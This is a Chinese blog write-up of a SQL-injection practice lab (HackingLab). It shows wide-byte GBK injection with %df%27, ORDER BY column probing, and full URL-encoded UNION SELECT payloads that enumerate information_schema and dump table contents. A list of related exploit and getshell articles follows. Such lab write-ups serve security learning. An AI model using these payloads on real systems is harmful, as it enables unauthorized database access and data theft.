HackingLab注入關

原創 星空下de青铜 2020-06-20 17:30

第一關
萬能密鑰
第二關
查看源碼–>tips:?id=1
在url後面加上?id=1 就可以正常注入了
第三關
=?id=1得到
錯誤頁面如下

在這裏插入圖片描述
寬字節
%df%27報錯
提示需要一個參數
傳參可能是(’$id’)–>(‘1漢字’’)

在這裏插入圖片描述
?id=1%df%27%23
(’$id’)–>(‘1漢字’#’)
好的,證明爲寬字節
在這裏插入圖片描述

order by 4 錯誤在這裏插入圖片描述
order by 3正常(返回空白頁面纔是正常)
在這裏插入圖片描述

如果不是寬字節的話id=1要變爲-1 或者在後面1=2(查詢語句類型爲false就行)
在這裏插入圖片描述有informa_schema

在這裏插入圖片描述
id=1%df%27union%20select%201,(select%20group_concat(schema_name)%20from%20information_schema.schemata),(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%23
在這裏插入圖片描述
爆字段
id=1%df%27union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7361655F757365725F73716C6934),(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%23在這裏插入圖片描述

dump數據
id=1%df%27union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7361655F757365725F73716C6934),(select%20group_concat(title_1,content_1)%20from%20sae_user_sqli4)%23
在這裏插入圖片描述

第四關
還是直接sqlmap就好

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

8_25 設置用戶id或組id的程序絕對不能再調用system函數。安全漏洞

vim 8_24.c #include "apue.h" int main(int argc, char *argv[]) {         int status;         if(argc < 2)              

ciky2011 2020-07-08 08:56:44

CVE-­2020­-0796(永恆之黑)漏洞復現Getshell

MySQL數據庫從入門到實戰應用 CVE-­2020­-0796漏洞復現CVE-­2020­-0796受影響的系統版本環境搭建漏洞檢測-掃描漏洞復現-返回會話漏洞復現-藍屏攻擊視頻演示漏洞修復 CVE-­2020­-0796

小陈classmate 2020-07-05 14:10:43

Ubantu16.04服務器nginx配置安全狗防護

文章目錄一、前言二、正文1.服務器安裝安全狗2.控制檯綁定服務器ip三、總結 一、前言 6月是個忙碌的季節,百忙之中有小夥伴來問到:“你換域名了嗎?”我詫異,明明什麼都沒有做,立馬打開瀏覽器輸入訪問我的網站,出現了無法訪問的情況。

cungudafa 2020-07-03 19:11:35

小心你的密碼管理器 LastPass曝出安全漏洞

今天,各種各樣的金融賬戶、網絡帳戶、個人信息都需要用到密碼,但對於大多數人來說,常用的密碼十分有限,而且一旦使用長一些、複雜一些的新密碼後,往往一段時間過後便被忘的一乾二淨。所以,目前有數以百萬計的人依靠密碼管理器來保存他們的密碼,並幫

jlangqi 2020-07-03 09:07:29

任意用戶密碼修改重置漏洞修復

0x00 背景 密碼修改功能常採用分步驟方式來實現,攻擊者在未知原始密碼的情況下繞過某些檢驗步驟修改用戶密碼。 重置密碼過程一般是首先驗證註冊的郵箱或者手機號,獲取重置密碼的鏈接(一般會包含一串唯一的字符串)或者驗證碼,然後訪問重置密碼鏈

煜铭2011 2020-07-02 14:46:36

OWASP發佈構建安全Web應用的十大控制措施

Open Web Application Security Project(OWASP)是世界範圍內的非盈利組織,關注於提高軟件系統的安全性。它們的使命是使應用軟件更加安全,使企業和組織能夠對應用安全風險作出更清晰的決策。OWASP發佈

wxy_fighting 2020-07-01 19:17:31

Linux應急響應基礎(Linux服務器入侵響應)學習

主要是階段性的總結一些Linux下的應急響應常用命令及技巧 文章目錄登錄和終端信息查看登錄用戶信息查看登錄失敗信息查看用戶上一次的登錄情況查看當前登錄系統的情況查看登錄成功信息查看登錄失敗信息強制用戶下線終端歷史命令用戶信息查看是

尸者狗 2020-06-30 21:35:34

Fofa的簡單使用

因爲沒氪金,沒法深入研究,,, 文章目錄地址簡介查詢語法參考基本語法邏輯運算符其他 地址 https://www.fofa.so/ 簡介 官網這樣描述:FOFA是白帽匯推出的一款網絡空間資產搜索引擎。它能夠幫助用戶迅速進行網絡資產

尸者狗 2020-06-30 21:35:34

1—內網安全——內網滲透基礎

目錄 1. 什麼是內網 2. 內網基礎的相關概念 3. 工作組 4. 域的相關概念 5. 活動目錄 6. 安全域的劃分     1. 什麼是內網 學過計算機網絡的同學都知道一般內網指的是局域網,即一個局域範圍內的多個計算機設備連接而成的網

songly_ 2020-06-30 14:36:55

PhpMyAdmin4.8.1文件包含漏洞分析及復現利用(CVE-2018-12613)

漏洞原理 攻擊者利用發現在服務器上包含(查看和潛在執行)文件的漏洞。該漏洞來自一部分代碼,其中頁面在phpMyAdmin中被重定向和加載,以及對白名單頁面進行不正確的測試。 攻擊者必須經過身份驗證,但在這些情況下除外: $ cfg

想冲大厂的癞蛤蟆 2020-06-29 22:20:02

phpmyadmin+日誌getshell

通過phpmyadmin管理後臺getshell思路有很多種,比如直接寫入一句話、創建表再導出、慢查詢日誌等… 這裏較詳細介紹一下全局日誌getshell思路   phpMyAdmin phpMyAdmin 是衆多MySQL圖形化

想冲大厂的癞蛤蟆 2020-06-29 22:20:02

EmpireCMS文件寫入getshell

漏洞描述 Empirecms V6.5後臺自定義頁面處通過任意文件寫入可getshell ①任意文件寫入漏洞的原理通過提交數據,可以將任意的文件寫入到網站中。 ②攻擊者在獲取到後臺權限後,進行添加頁面,添加成php頁面,並且內容爲

想冲大厂的癞蛤蟆 2020-06-29 22:20:02

Drupal遠程代碼執行(CVE-2018-7602)與其Poc分析

漏洞概述 這個漏洞是CVE-2018-7600的繞過利用,兩個漏洞原理是一樣的。攻擊者可以通過不同方式利用該漏洞遠程執行代碼。CVE-2018-7602這個漏洞是CVE-2018-7600的另一個利用點,只是入口方式不一樣。所以,

想冲大厂的癞蛤蟆 2020-06-29 22:19:48

pikachu在線靶場(漏洞練習平臺)

希望大佬不要攻擊網站,改平臺只供測試學習用 測試地址:              http://45.32.81.200:8080                                            http://lur

anony-mous 2020-06-29 14:24:01

SQL正則盲注

題目鏈接: 地址 隨便輸入用戶名和密碼後登錄,跳到check.php頁面 下面是題目源碼 <?php include "config.php"; error_reporting(0); highlight_file(__FI

Mr. Anonymous 2020-06-29 06:10:38